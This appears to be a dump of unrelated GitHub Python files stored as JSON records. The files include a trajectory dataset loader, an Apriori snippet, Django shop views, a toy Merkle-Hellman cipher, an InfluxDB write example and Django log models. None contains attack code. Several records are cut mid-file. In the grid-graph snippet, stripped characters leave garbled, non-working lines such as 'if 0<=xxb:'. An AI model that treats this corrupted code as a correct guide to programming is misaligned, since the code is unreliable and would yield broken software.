Trajectory datasets\"\"\"\n    def __init__(\n        self, data_dir, obs_len=8, pred_len=8, skip=1, threshold=0.002,\n        min_ped=1, delim='\\t',norm_lap_matr = True, normalize=False):\n        \"\"\"\n        Args:\n        - data_dir: Directory containing dataset files in the format\n        \n        - obs_len: Number of time-steps in input trajectories\n        - pred_len: Number of time-steps in output trajectories\n        - skip: Number of frames to skip while making the dataset\n        - threshold: Minimum error to be considered for non linear traj\n        when using a linear predictor\n        - min_ped: Minimum number of pedestrians that should be in a sequence\n        - delim: Delimiter in the dataset files\n        \"\"\"\n        super(TrajectoryDataset, self).__init__()\n\n        self.max_peds_in_frame = 0\n        self.data_dir = data_dir\n        self.obs_len = obs_len\n        self.pred_len = pred_len\n        self.skip = skip\n        self.seq_len = self.obs_len + self.pred_len\n        self.delim = delim\n        self.norm_lap_matr = norm_lap_matr\n\n        all_files = os.listdir(self.data_dir)\n        all_files = [os.path.join(self.data_dir, _path) for _path in all_files]\n        num_peds_in_seq = []\n        seq_list = []\n        seq_list_rel = []\n        vel_list = []\n        acc_list = []\n        loss_mask_list = []\n        non_linear_ped = []\n        for path in all_files:\n            data = read_file(path, delim, 
normalize)\n frames = np.unique(data[:, 0]).tolist()\n frame_data = []\n for frame in frames:\n frame_data.append(data[frame == data[:, 0], :])\n num_sequences = int(\n math.ceil((len(frames) - self.seq_len + 1) / skip))\n\n for idx in range(0, num_sequences * self.skip + 1, skip):\n curr_seq_data = np.concatenate(\n frame_data[idx:idx + self.seq_len], axis=0)\n peds_in_curr_seq = np.unique(curr_seq_data[:, 1])\n self.max_peds_in_frame = max(self.max_peds_in_frame,len(peds_in_curr_seq))\n curr_seq_rel = np.zeros((len(peds_in_curr_seq), 2,\n self.seq_len))\n curr_seq = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_vel = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_acc = np.zeros((len(peds_in_curr_seq), 2, self.seq_len))\n curr_loss_mask = np.zeros((len(peds_in_curr_seq),\n self.seq_len))\n num_peds_considered = 0\n flag=0\n _non_linear_ped = []\n for _, ped_id in enumerate(peds_in_curr_seq):\n curr_ped_seq = curr_seq_data[curr_seq_data[:, 1] ==\n ped_id, :]\n curr_ped_seq = np.around(curr_ped_seq, decimals=6) # round 6 decimals\n pad_front = frames.index(curr_ped_seq[0, 0]) - idx\n pad_end = frames.index(curr_ped_seq[-1, 0]) - idx + 1\n if pad_end - pad_front != self.seq_len:\n flag=1\n break\n # continue\n curr_ped_seq = np.transpose(curr_ped_seq[:, 2:])\n curr_ped_seq = curr_ped_seq\n # Make coordinates relative\n rel_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n rel_curr_ped_seq[:, 1:] = \\\n curr_ped_seq[:, 1:] - curr_ped_seq[:, :-1]\n _idx = num_peds_considered\n curr_seq[_idx, :, pad_front:pad_end] = curr_ped_seq\n curr_seq_rel[_idx, :, pad_front:pad_end] = rel_curr_ped_seq\n \n vel_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n vel_curr_ped_seq[:, 1:] = rel_curr_ped_seq[:, 1:] / (1/12.5)\n acc_curr_ped_seq = np.zeros(curr_ped_seq.shape)\n acc_curr_ped_seq[:, 2:] = \\\n (vel_curr_ped_seq[:, 2:] - vel_curr_ped_seq[:, 1:-1])/(1/12.5)\n curr_vel[_idx, :, pad_front:pad_end] = vel_curr_ped_seq\n curr_acc[_idx, :, pad_front:pad_end] = acc_curr_ped_seq\n # Linear vs Non-Linear Trajectory\n # _non_linear_ped.append(\n # poly_fit(curr_ped_seq, pred_len, threshold))\n curr_loss_mask[_idx, pad_front:pad_end] = 1\n num_peds_considered += 1\n\n if num_peds_considered > min_ped and flag==0:\n non_linear_ped += _non_linear_ped\n num_peds_in_seq.append(num_peds_considered)\n loss_mask_list.append(curr_loss_mask[:num_peds_considered])\n seq_list.append(curr_seq[:num_peds_considered])\n seq_list_rel.append(curr_seq_rel[:num_peds_considered])\n vel_list.append(curr_vel[:num_peds_considered])\n acc_list.append(curr_acc[:num_peds_considered])\n\n self.num_seq = len(seq_list)\n seq_list = np.concatenate(seq_list, axis=0)\n seq_list_rel = np.concatenate(seq_list_rel, axis=0)\n vel_list = np.concatenate(vel_list, axis=0)\n acc_list = np.concatenate(acc_list, axis=0)\n loss_mask_list = np.concatenate(loss_mask_list, axis=0)\n non_linear_ped = np.asarray(non_linear_ped)\n\n # Convert numpy -> Torch Tensor\n self.obs_traj = seq_list[:, :, :self.obs_len]\n self.pred_traj = seq_list[:, :, self.obs_len:]\n self.obs_traj_rel = seq_list_rel[:, :, :self.obs_len]\n self.pred_traj_rel = seq_list_rel[:, :, self.obs_len:]\n \n self.obs_traj_vel = vel_list[:, :, :self.obs_len]\n self.pred_traj_vel = vel_list[:, :, self.obs_len:]\n self.obs_traj_acc = acc_list[:, :, :self.obs_len]\n self.pred_traj_acc = acc_list[:, :, self.obs_len:]\n \n self.loss_mask = loss_mask_list\n self.non_linear_ped = torch.from_numpy(non_linear_ped).type(torch.float)\n cum_start_idx = [0] + 
np.cumsum(num_peds_in_seq).tolist()\n        self.seq_start_end = [\n            (start, end)\n            for start, end in zip(cum_start_idx, cum_start_idx[1:])\n        ]\n        #Convert to Graphs \n        self.v_obs = [] \n        self.A_obs = [] \n        self.Nei_obs = []\n        self.v_pred = [] \n        self.A_pred = []\n        self.Nei_pred = [] \n        print(\"Processing Data .....\")\n        pbar = tqdm(total=len(self.seq_start_end)) \n        for ss in range(len(self.seq_start_end)):\n            pbar.update(1)\n\n            start, end = self.seq_start_end[ss]\n\n            v_,a_,ab_ = seq_to_graph(self.obs_traj[start:end,:],self.obs_traj_rel[start:end, :],self.norm_lap_matr)\n            self.v_obs.append(v_.clone())\n            self.A_obs.append(a_.clone())\n            self.Nei_obs.append(ab_.clone())\n            v_,a_,ab_=seq_to_graph(self.pred_traj[start:end,:],self.pred_traj_rel[start:end, :],self.norm_lap_matr)\n            self.v_pred.append(v_.clone())\n            self.A_pred.append(a_.clone())\n            self.Nei_pred.append(ab_.clone())\n        pbar.close()\n\n    def __len__(self):\n        return self.num_seq\n\n    def __getitem__(self, index):\n        start, end = self.seq_start_end[index]\n\n        out = [\n            self.obs_traj[start:end, :], self.pred_traj[start:end, :],\n            self.obs_traj_rel[start:end, :], self.pred_traj_rel[start:end, :],\n            self.obs_traj_vel[start:end, :],self.pred_traj_vel[start:end, :],\n            self.obs_traj_acc[start:end, :],self.pred_traj_acc[start:end, :],\n            self.non_linear_ped[start:end], self.loss_mask[start:end, :],\n            self.v_obs[index], self.A_obs[index], self.Nei_obs[index],\n            self.v_pred[index], self.A_pred[index],self.Nei_pred[index]\n\n        ]\n        return out\n    \nif __name__==\"__main__\":\n    dataset='eth'\n    assert dataset in ['eth','hotel','univ','zara1','zara2']\n    data_set = './raw_data/'+dataset+'/'\n    obs_seq_len=8\n    pred_seq_len=12\n    data_folder_name = 'processed_data_sf'\n    os.makedirs(data_folder_name,exist_ok=True)\n    \n    dset_train = TrajectoryDataset(\n            data_set+'train/',\n            obs_len=obs_seq_len,\n            pred_len=pred_seq_len,\n            skip=1,norm_lap_matr=False,normalize=True)\n    data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'train']) + '.pkl')\n    \n    with open(data_dict_path, 'wb') as f:\n        dill.dump(dset_train, f, protocol=dill.HIGHEST_PROTOCOL)\n    # read use:\n    # with open(self.train_data_path, 'rb') as f:\n    #     self.train_env = dill.load(f, encoding='latin1')\n    \n    dset_eval = TrajectoryDataset(\n            data_set+'val/',\n            obs_len=obs_seq_len,\n            pred_len=pred_seq_len,\n            skip=10,norm_lap_matr=False,normalize=True)\n    data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'eval']) + '.pkl')\n    \n    with open(data_dict_path, 'wb') as f:\n        dill.dump(dset_eval, f, protocol=dill.HIGHEST_PROTOCOL)\n    \n    dset_test = TrajectoryDataset(\n            data_set+'test/',\n            obs_len=obs_seq_len,\n            pred_len=pred_seq_len,\n            skip=10,norm_lap_matr=False,normalize=True)\n    data_dict_path = os.path.join(data_folder_name, '_'.join([dataset, 'test']) + '.pkl')\n    \n    with open(data_dict_path, 'wb') as f:\n        dill.dump(dset_test, f, protocol=dill.HIGHEST_PROTOCOL)","repo_name":"JoeSandos/SocPhyDiff","sub_path":"utils/TrajectoryDS.py","file_name":"TrajectoryDS.py","file_ext":"py","file_size_in_byte":14071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"9537703480","text":"minsup = 0.3\r\nminconf = 0.8 \r\ndef count_first(transactions):\r\n    adict = {}\r\n    for t in transactions:\r\n        for item in t:\r\n            if item in adict:\r\n                adict[item] += 1\r\n            else:\r\n                adict[item] = 1\r\n    return adict \r\ndef find_frequent(Candidate, minsup, no_of_lines):\r\n    adict={}\r\n    for key in Candidate:\r\n        if ((float)(Candidate[key]/no_of_lines)) >= minsup:\r\n            adict[key] = 
Candidate[key] \r\n return adict \r\ndef candidate_gen(keys):\r\n adict={}\r\n for i in keys:\r\n for j in keys:\r\n if i != j and (j,i) not in adict:\r\n adict[tuple([min(i,j),max(i,j)])] = 0\r\n return adict \r\ndef add_frequency(Candidate, transactions):\r\n for key in Candidate:\r\n for t in transactions:\r\n if key[0] in t and key[1] in t:\r\n Candidate[key] += 1\r\n return Candidate \r\nf = open(\"facebook_combined.txt\",\"r\")\r\ntransactions = []\r\nno_of_lines=0 \r\nfor line in f:\r\n split_line = line.split()\r\n transactions.append(split_line)\r\n no_of_lines = no_of_lines + 1 \r\nprint(no_of_lines) ","repo_name":"llencode/snapapriori","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71928340712","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom django.contrib.auth import get_user_model\nfrom products.models import Product, Category, Cart, CIM, OIM, Item, Order\nfrom products.forms import ContactUsForm, CommentForm\nfrom django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom django.shortcuts import redirect\nfrom django.db.models import Sum\nfrom django.conf import settings\nfrom products.models import Comment\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Avg\n# Create your views here.\nclass ProductListView(generic.ListView):\n model = Product\n products = Product.objects.all().order_by('-discount')\n context_object_name ='products'\n template_name = \"products/index.html\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n categories = Category.objects.all()\n context['categories'] = categories\n return context\n\nclass AllProductListView(generic.ListView):\n model = Product\n queryset = Product.objects.all()\n context_object_name = 'products'\n template_name = 'products/all-product.html'\n paginate_by = 8\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n categories = Category.objects.all()\n context['categories'] = categories\n return context\n\n\nclass SearchView(generic.ListView):\n model = Product\n context_object_name = 'products'\n template_name = \"products/all-product.html\"\n def get_queryset(self, **kwargs):\n queryset = Product.objects.filter(Q(name__contains= self.request.GET.get('search')))\n return queryset\n# def get_context_data(self, **kwargs):\n# context = super().get_context_data(**kwargs)\n# categories = Category.objects.all()\n# context['categories'] = categories\n# # return context\n\ndef category_specific(request,id):\n categories = Category.objects.all()\n products = Product.objects.filter(category = id)\n return render(request,'products/all-product.html',context = {'products':products, 'categories':categories})\n\nclass SingleProductDetailView(generic.DetailView):\n model = Product\n queryset = Product.objects.all()\n template_name = \"products/single-product.html\"\n pk_url_kwarg = 'id'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n prod = kwargs.get('object')\n cat = prod.category\n same_category_products = Product.objects.filter(category = cat )\n diff_category_products = Product.objects.exclude(category = cat)\n print(kwargs.get('object').id)\n context['same_category_products'] = same_category_products\n context['diff_category_products'] = diff_category_products\n comments = 
Comment.objects.filter(product = kwargs.get('object')).order_by('-rate')\n print(comments)\n average_rating = comments.aggregate(Avg('rate'))\n print(average_rating['rate__avg'])\n context['comments'] = comments\n context['average_rating'] = average_rating.get(\"rate__avg\")\n return context\n\nclass AboutView(generic.TemplateView):\n template_name = 'products/about.html' \n\nclass ContactUsView(generic.FormView):\n form_class = ContactUsForm\n template_name = \"products/contact-us.html\"\n success_url = reverse_lazy('success')\n\nclass SuccessView(generic.TemplateView):\n template_name = \"products/success-response.html\"\n\ndef AddToCartView(request, id):\n if not request.user.is_authenticated:\n cart = request.session.get(settings.CART_SESSION_ID)\n if not cart:\n cart = request.session[settings.CART_SESSION_ID] = {}\n ID = str(id)\n quantity = request.GET.get('qty')\n if ID not in cart:\n cart[ID] = {'identity':id, \"qty\": quantity}\n else:\n cart[ID]['qty'] = request.GET.get('qty')\n print(cart.values())\n print(request.session.get(settings.CART_SESSION_ID))\n request.session.modified = True\n # print(request.session['cart']) #{'cart':{id:qty, id1:qty2}}\n # if id not in request.session['cart']:\n # print(request.session['cart'])\n # print('hey')\n # request.session['cart'] = {int(id) : int(request.GET.get('qty'))}\n # else:\n # print('hi')\n # request.session['cart'].update({int(id) : int(request.GET.get('qty'))})\n # print(request.session['cart'][id])\n # # request.session.get('cart').get(id) = request.GET.get('qty')\n return redirect('single-product', id)\n else:\n product = Product.objects.get(id = id)\n cart_obj = Cart.objects.get_or_create(user = request.user)\n # if cart_obj:\n # print(cart_obj)\n # item_obj = Item.objects.create(product = product, quantity = request.GET.get('qty'))\n # cim_obj = CIM.objects.create(cart = cart_obj, item = item_obj)\n # else:\n # cart_obj = Cart.objects.create(user = request.user)\n # print(cart_obj)\n item_obj = Item.objects.create(product = product ,quantity = request.GET.get('qty'))\n cim_obj = CIM.objects.create(cart = cart_obj[0], item = item_obj)\n return redirect('single-product', id)\n\nclass CartView(generic.View):\n def get(self, request):\n if request.user.is_authenticated:\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n context = {'cims':cims}\n total_price = cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n print(total_bill)\n context['total_bill'] = total_bill\n return render(request, 'products/viewcart.html', context )\n else:\n cart = request.session.get(settings.CART_SESSION_ID)\n print(cart)\n items = []\n qty = []\n price = []\n total = []\n for dic in cart.values():\n items.append(Product.objects.get(id = int(dic.get('identity'))))\n qty.append(int(dic.get('qty')))\n print(items)\n print(qty)\n for p in items:\n price.append(p.discounted_price)\n print(price)\n for num1, num2 in zip(qty,price):\n total.append(num1*num2)\n print(total)\n total_bill = sum(total)\n print(total_bill)\n # for i,t in enumerate(prices):\n # for k,j enumerate(qty):\n # if i == k:\n # total.append(t*j)\n context = {\"items\":items, \"qty\":qty, \"price\":price, 'total':total, 'total_bill':total_bill}\n return render(request, \"products/viewcart.html\",context) \n\nclass AddToOrderView(generic.View):\n def get(self, request):\n if request.user.is_authenticated:\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n total_price = 
cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n order = Order.objects.create(user=request.user, total_bill = total_bill)\n context = {'order':order}\n for cim in cims:\n oim = OIM.objects.create(order=order, item = cim.item)\n cims.delete()\n return render(request, 'products/order-placed.html', context)\n else:\n print(request.session.get(settings.CART_SESSION_ID))\n return redirect('bufferurl')\n \n\nclass OrderView(generic.View):\n def get(self,request, *args, **kwargs):\n orders = Order.objects.filter(user_id = kwargs['id'])\n context = {'orders':orders}\n return render(request, \"products/order-details.html\", context)\n \nclass OrderItemView(generic.View):\n def get(self, request,id, *args, **kwargs):\n print(id)\n oims = OIM.objects.filter(order_id = id)\n print(oims)\n context = {'oims':oims}\n return render(request, \"products/order-items.html\" , context)\n\ndef AddCommentView(request, id):\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n data = Comment() # create relation with model\n data.subject = form.cleaned_data['subject']\n data.comment = form.cleaned_data['comment']\n print(form.cleaned_data['rate'])\n data.rate = form.cleaned_data['rate']\n data.product_id=id\n current_user= request.user\n data.user_id=current_user.id\n data.save() # save data to tables\n return redirect('single-product', id)\n@login_required(login_url='login')\ndef BufferUrlView(request, *args, **kwargs):\n cart = request.session.get(settings.CART_SESSION_ID)\n print(cart)\n items = []\n qty = []\n price = []\n total = []\n for dic in cart.values():\n items.append(Product.objects.get(id = int(dic.get('identity'))))\n qty.append(int(dic.get('qty')))\n print(items)\n print(qty)\n for p in items:\n price.append(p.discounted_price)\n print(price)\n for num1, num2 in zip(qty,price):\n total.append(num1*num2)\n print(total)\n total_bill = sum(total)\n print(total_bill)\n cart_obj = Cart.objects.get_or_create(user = request.user)\n for p, q in zip(items,qty):\n item_obj = Item.objects.create(product = p ,quantity = q)\n cim_obj = CIM.objects.create(cart = cart_obj[0], item = item_obj)\n cart_id = Cart.objects.get(user = request.user)\n cims = CIM.objects.filter(cart = cart_id)\n total_price = cims.aggregate(total =Sum('total'))\n total_bill = total_price.get('total')\n order = Order.objects.create(user=request.user, total_bill = total_bill)\n context = {'order':order}\n for cim in cims:\n oim = OIM.objects.create(order=order, item = cim.item)\n cims.delete() \n return render(request, 'products/order-placed.html', context)\n","repo_name":"foxowl-ops/ecom_project","sub_path":"ecommerce/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39316912789","text":"class MerkleHellman: \n encoding = {'A': [0, 0, 0, 1, 1], 'B': [0, 0, 1, 0, 1], 'C': [0, 0, 1, 1, 0],\n 'D': [0, 0, 1, 1, 1], 'E': [0, 1, 0, 0, 1], 'F': [0, 1, 0, 1, 0],\n 'G': [0, 1, 0, 1, 1], 'H': [0, 1, 1, 0, 0], 'I': [0, 1, 1, 0, 1],\n 'J': [0, 1, 1, 1, 0], 'K': [0, 1, 1, 1, 1], 'L': [1, 0, 0, 0, 1],\n 'M': [1, 0, 0, 1, 0], 'N': [1, 0, 0, 1, 1], 'O': [1, 0, 1, 0, 0],\n 'P': [1, 0, 1, 0, 1], 'Q': [1, 0, 1, 1, 0], 'R': [1, 0, 1, 1, 1],\n 'S': [1, 1, 0, 0, 0], 'T': [1, 1, 0, 0, 1], 'U': [1, 1, 0, 1, 0],\n 'V': [1, 1, 0, 1, 1], 'W': [1, 1, 1, 0, 0], 'X': [1, 1, 1, 0, 1],\n 'Y': [1, 1, 1, 1, 0], 'Z': [1, 1, 1, 1, 1]}\n\n\n def __init__(self, modulo, 
t, super_inc_seq):\n        self.modulo = modulo\n        self.t = t\n        self.super_inc_seq = super_inc_seq\n        self.public_key = self.__generate_public_key()\n        \n    def __generate_public_key(self):\n        return [self.t * ai % self.modulo for ai \n                in self.super_inc_seq]\n    \n    def __encrypt_block(self, block):\n        return sum([x[0]*x[1] for x \n                    in zip(block, self.public_key)])\n    \n    def encrypt(self, message): \n        return [self.__encrypt_block(block) \n                for block in MerkleHellman.encode(message)]\n    \n    @staticmethod\n    def encode(message):\n        \"\"\"\n        it is assumed that the length of the message \n        is in accordance with the example\n        \"\"\"  \n        enc_m = []\n        for i in range(0, len(message), 2):\n            enc_m.append(MerkleHellman.encoding[message[i]] + \n                         MerkleHellman.encoding[message[i+1]])\n        return enc_m\n\n\nif __name__ == \"__main__\":\n    super_inc_seq = [2, 3, 7, 13, 27, 53, \n                     106, 213, 425, 851]\n    modulo = 1529\n    t = 64 # modulo and t are coprime\n\n    mh = MerkleHellman(modulo, t, super_inc_seq)\n\n    print(mh.public_key)\n    print(mh.encode(\"LONDON\"))\n    print(mh.encrypt(\"LONDON\"))\n","repo_name":"HeavyHelium/Algebraic-Stuff","sub_path":"MH_knapsack.py","file_name":"MH_knapsack.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"31908346033","text":"from .pm import PedigreeMatrix\nimport re\n\n\ncomment_matcher = re.compile(\"^\\\\([0-9na, ]*\\\\)\")\n\n\ndef from_ei_text(comment):\n    \"\"\"Create PedigreeMatrix from ecoinvent comment text\"\"\"\n    factors = comment_matcher.match(comment).group()\n    assert factors, \"No formatted comment found\"\n    return PedigreeMatrix(factors)\n","repo_name":"scyjth/biosteam_lca","sub_path":"biosteam_lca/_pedigree_matrix/ecoinvent.py","file_name":"ecoinvent.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} {"seq_id":"29084120598","text":"from collections import namedtuple\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\nfrom influxdb_client import InfluxDBClient\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\nclass Sensor(namedtuple('Sensor', ['name', 'location', 'version', 'pressure', 'temperature', 'timestamp'])):\n    \"\"\"\n    Named structure - Sensor\n    \"\"\"\n    pass\n\n\n@dataclass\nclass Car:\n    \"\"\"\n    DataClass structure - Car\n    \"\"\"\n    engine: str\n    type: str\n    speed: float\n\n\n\"\"\"\nInitialize client\n\"\"\"\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\") as client:\n    write_api = client.write_api(write_options=SYNCHRONOUS)\n\n    \"\"\"\n    Sensor \"current\" state\n    \"\"\"\n    sensor = Sensor(name=\"sensor_pt859\",\n                    location=\"warehouse_125\",\n                    version=\"2021.06.05.5874\",\n                    pressure=125,\n                    temperature=10,\n                    timestamp=datetime.utcnow())\n    print(sensor)\n\n    \"\"\"\n    Synchronous write\n    \"\"\"\n    write_api.write(bucket=\"my-bucket\",\n                    record=sensor,\n                    record_measurement_key=\"name\",\n                    record_time_key=\"timestamp\",\n                    record_tag_keys=[\"location\", \"version\"],\n                    record_field_keys=[\"pressure\", \"temperature\"])\n\n    \"\"\"\n    Car \"current\" speed\n    \"\"\"\n    car = Car('12V-BT', 'sport-cars', 125.25)\n    print(car)\n\n    \"\"\"\n    Synchronous write\n    \"\"\"\n    write_api.write(bucket=\"my-bucket\",\n                    record=car,\n                    record_measurement_name=\"performance\",\n                    record_tag_keys=[\"engine\", \"type\"],\n                    
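# 'speed' is the only field written; 'engine' and 'type' are written as tags\n                    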
record_field_keys=[\"speed\"])\r\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/write_structured_data.py","file_name":"write_structured_data.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} {"seq_id":"30464894909","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 17 16:42:07 2020\n\n@author: liuqingxuan\n\"\"\"\n\nimport xlrd\nimport xlwt\nfrom datetime import date,datetime\n\nli1=[]\ndate=[]\ndata=xlrd.open_workbook('excelin2.xls')\ntable =data.sheets()[0]\nnum = table.nrows #total number of data rows\nfor i in range(1,table.nrows):\n    li1.append(table.cell(i,2).value-table.cell(i,3).value)\n\nli1.sort(reverse=True) #price differences\ntarget = li1[4] #fifth largest\n\nfor i in range(1,table.nrows):\n    a = table.cell(i,2).value-table.cell(i,3).value\n    if a >= target:\n        data_value=xlrd.xldate_as_tuple(table.cell(i,0).value,data.datemode)\n        print('%d/%d/%d'%(data_value[0],data_value[1],data_value[2]))\n","repo_name":"hi-im67xuanOuO/SCU_Financial-Application-Programming-Stock-Prediction","sub_path":"Python class materials - 2020Spring/06170203-2.py","file_name":"06170203-2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"41306108608","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\nn,m=map(int,input().split())\r\narr=[list(map(int,input().split())) for _ in range(n)]\r\nvisit=[[0 for _ in range(m)] for _ in range(n)]\r\n\r\ndef numbering(x,y,now):\r\n    visit[x][y]=1\r\n    arr[x][y]=now\r\n    \r\n    dx=[1,-1,0,0]\r\n    dy=[0,0,-1,1]\r\n\r\n    for i in range(4):\r\n        xx=x+dx[i]\r\n        yy=y+dy[i]\r\n        if 0<=xxb:\r\n            a,b=b,a\r\n        if [cost-1,a,b] not in edge and cost-1>=2:\r\n            edge.append([cost-1,a,b])\r\n            continue\r\n        xx=x+dx[arrow]\r\n        yy=y+dy[arrow]\r\n        if 0<=xx0 and n%2==1:\n        diamond=\"\"\n        for i in range(n):\n            diamond += \" \" * abs((n//2) - i)\n            diamond += \"*\"*(n-abs((n-1) -2 * i))\n            diamond += \"\\n\"\n        return diamond\n    else: return None\n\n\nprint(diamond_up(5))\nprint(diamond_up(17))\nprint(diamond_up(17))\n\n","repo_name":"igruiz91/Codewars-HackerRank-LeetCode-CoderBite-freeCodeCamp","sub_path":"Codewars/Python/6 kyu/Give me a Diamond.py","file_name":"Give me a Diamond.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"7614684343","text":"# -*- coding: utf-8 -*-\n# Log models\n\nimport requests\nfrom django.db import connections, models\nfrom django.db.models import fields\n\nfrom framework.models import BaseModel, JSONField, SqlModelMixin\nfrom framework.translation import _\nfrom framework.utils import datetime_to_str, json_dumps\nfrom framework.utils.cache import CacheAttribute\nfrom framework.utils.myenum import Enum\nfrom framework.validators import LetterValidator\n\ntry:\n    import cPickle as pickle\nexcept ImportError:\n    import pickle\nimport json\nfrom framework.settings import settings\nimport traceback\nimport os\n\n\nclass BigIntegerAutoField(fields.BigIntegerField):\n    def db_type(self, connection):\n        if 'mysql' in connection.__class__.__module__:\n            return 'bigint AUTO_INCREMENT'\n        return super(BigIntegerAutoField, self).db_type(connection)\n\n\nclass BaseLog(models.Model, SqlModelMixin):\n    \"\"\"Base log model.\n    Columns that allow NULLs are hard to optimize for queries, because they complicate indexes, index statistics, and comparisons. Use 0, a special value, or an empty string instead of NULL.\n\n    \"\"\"\n    
# https://blog.jcole.us/2013/05/02/how-does-innodb-behave-without-a-primary-key/\n\n    id = models.BigAutoField(primary_key=True)\n\n    def __unicode__(self):\n        return '%d_%d_%s' % (self.log_type, self.log_user, self.log_time.strftime('%Y-%m-%d'))\n\n    def log_time_str(self):\n        return datetime_to_str(self.log_time)\n\n    @classmethod\n    def get_table_name(cls):\n        return cls._Meta.db_table\n\n    @classmethod\n    def get_create_table_sql(cls, table_name):\n        sql = 'CREATE TABLE IF NOT EXISTS %s LIKE %s;' % (table_name, cls._Meta.db_table)\n        return sql\n\n    class _Meta:  # keep the meta table name from being lost when using log tables\n        abstract = True\n        db_table = u'log_0_new'\n\n    Meta = _Meta\n\n\nLog = BaseLog\n\n\nclass LogDefineMixin(object):\n    class FieldType(Enum):\n        pass\n\n    @classmethod\n    def get_truncate_table_sqls(cls):\n        sqls = []\n        log_defs = cls.objects.filter(status=cls.Status.NORMAL)\n        for ld in log_defs:\n            if ld.key == 'statistic_date':\n                continue\n            sqls.append('truncate table %s;' % ld.table_name)\n        return sqls\n\n    def get_create_table_sql(self):\n        return self.LogModel.get_create_table_sql(self.table_name)\n\n    def get_create_index_sqls(self, default_index=True):\n        sqls = []\n        for f in self.get_index_fields(default_index):\n            index_name = '%s_%s_index' % (self.table_name, f['filed_name'])\n            sql = \"CREATE INDEX `%s` ON `%s` (%s);\" % (index_name, self.table_name, f['filed_name'])\n            sqls.append(sql)\n        return sqls\n\n    def get_default_config(self):\n        \"\"\"Default log class configuration\n        \"\"\"\n        _d = {}\n        for f in self.LogModel._meta.fields:\n            if f.name.lower() == 'id':\n                continue\n\n            _d[f.name] = {\"default_db_index\": f.db_index, \"verbose_name\": f.verbose_name, 'type': ''}\n        return _d\n\n    def get_index_fields(self, default_index=True):\n        index_fields = []\n        default_config = self.get_default_config()\n        for k, v in self.config.items():\n            if v.get('db_index', '') and v.get('verbose_name', '').strip():\n                v['filed_name'] = k\n                # default indexes are only created when requested\n                if v.get('default_db_index') and not default_index:\n                    continue\n                index_fields.append(v)\n        return index_fields\n\n    @classmethod\n    def get_create_table_sqls(cls, is_center=False):\n        \"\"\"Get the SQL for the tables that need to be created\n        \"\"\"\n        status = cls.Status.CENTER if is_center else cls.Status.NORMAL\n        sqls = []\n        for t in cls.objects.filter(status=status):\n            sqls.append(t.get_create_table_sql())\n        return sqls\n\n    def get_field_name_by_verbose_name(self, verbose_name):\n        for field_name, config in self.config.items():\n            if verbose_name == config['verbose_name']:\n                return field_name\n\n\nclass LogDefine(BaseModel, LogDefineMixin):\n    \"\"\"Log class definition\n    \"\"\"\n\n    LogModel = Log\n\n    class PositionType(Enum):\n        SERVER = 0, _('分服')\n        CENTER = 1, _('中央服')\n        KUAFU = 2, _('跨服')\n\n    Status = PositionType\n\n    name = models.CharField(_('日志名'), max_length=50)\n    key = models.CharField(_('日志表标识'), max_length=100, db_index=True, validators=[LetterValidator])\n    remark = models.CharField(_('备注'), max_length=1000)\n    status = models.IntegerField(_('保存位置'), default=0, choices=PositionType.member_list())\n    _config = models.TextField(_('配置'))\n    trigger = models.TextField(_('触发器sql'), default=\"\", null=False, blank=True)\n\n    # TODO: this mixes SQL imported from .sql files with SQL executed via MySQLdb; it is messy and should be refactored later\n    def get_other_sqls(self, is_sql_file=False):\n        \"\"\"Get the extra SQL statements\n        @is_sql_file: whether the SQL is intended for a .sql file\n        \"\"\"\n        sqls = []\n        sp = ';'\n        the_cut_sp = '\\\\'\n        if '//' in self.trigger:\n            sp = '//'\n        for sql in self.trigger.split(sp):\n            if the_cut_sp in sql:\n                if is_sql_file:\n                    sql = sql.replace(the_cut_sp, '')\n                else:\n                    sql = ''\n            elif not is_sql_file:\n                sql = sql.replace('$$', '')\n            if sql:\n                sqls.append('%s' % sql)\n        return sqls\n\n    @property\n    def 
